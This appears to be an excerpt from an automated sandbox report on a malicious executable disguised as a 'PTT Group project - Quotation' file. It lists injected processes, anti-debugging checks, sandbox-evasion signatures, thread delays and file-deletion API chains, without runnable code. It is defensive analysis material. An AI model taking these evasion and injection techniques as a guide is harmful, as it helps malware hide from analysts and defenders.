Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403106 push es; iretd	1_2_00403107
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004231A3 push esi; retf	1_2_004231AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004163CC push ebx; iretd	1_2_0041643F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004013D0 pushad ; retn E4ABh	1_2_004014A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403390 push eax; ret	1_2_00403392
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401BAC pushad ; ret	1_2_00401C26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413C1B push es; retf	1_2_00413C22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401C2D pushad ; ret	1_2_00401C26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417C99 push esp; iretd	1_2_00417CA6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004145A1 push es; iretd	1_2_004145AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040A6E8 pushfd ; iretd	1_2_0040A702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00405775 push edx; iretd	1_2_00405744
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004187D5 pushfd ; ret	1_2_004187DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380225F pushad ; ret	1_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038027FA pushad ; ret	1_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx	1_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380283D push eax; iretd	1_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03801368 push eax; iretd	1_2_03801369
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0334225F pushad ; ret	3_2_033427F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033427FA pushad ; ret	3_2_033427F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033709AD push ecx; mov dword ptr [esp], ecx	3_2_033709B6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0334283D push eax; iretd	3_2_03342858
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029A23E2 push edx; iretd	3_2_029A23B1

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00914A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00914A35
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_009955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_009955FD

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009333C7

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	API/Special instruction interceptor: Address: 873254
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0387096E rdtsc

1_2_0387096E

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Window / User API: threadDelayed 3252			Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Window / User API: threadDelayed 6721			Jump to behavior

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100437

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668	Thread sleep count: 3252 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668	Thread sleep time: -6504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668	Thread sleep count: 6721 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668	Thread sleep time: -13442000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00974696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00974696
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0097C9C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097C93C FindFirstFileW,FindClose,	0_2_0097C93C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097F200
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097F35D
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0097F65E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00973A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00973A2B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00973D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00973D4E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0097BF27
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029BBBE0 FindFirstFileW,FindNextFileW,FindClose,	3_2_029BBBE0

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00914AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00914AFE

Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088199060.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2054458383.0000016C122DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	API call chain: ExitProcess graph end node			graph_0-99797
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	API call chain: ExitProcess graph end node			graph_0-99368

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0387096E rdtsc

1_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004175B3 LdrLoadDll,

1_2_004175B3

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009841FD BlockInput,

0_2_009841FD

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00913B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00913B4C

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00945CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00945CCC

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0098C304 LoadLibraryA,GetProcAddress,

0_2_0098C304

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_008734C0 mov eax, dword ptr fs:[00000030h]	0_2_008734C0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00873520 mov eax, dword ptr fs:[00000030h]	0_2_00873520
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00871E70 mov eax, dword ptr fs:[00000030h]	0_2_00871E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]	1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]	1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]	1_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]	1_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]	1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]	1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]	1_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]	1_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]	1_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]	1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]	1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]	1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]	1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]	1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]	1_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]	1_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]	1_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]	1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]	1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]	1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]	1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]	1_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]	1_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]	1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]	1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]	1_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]	1_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]	1_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]	1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]	1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]	1_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]	1_2_03870185
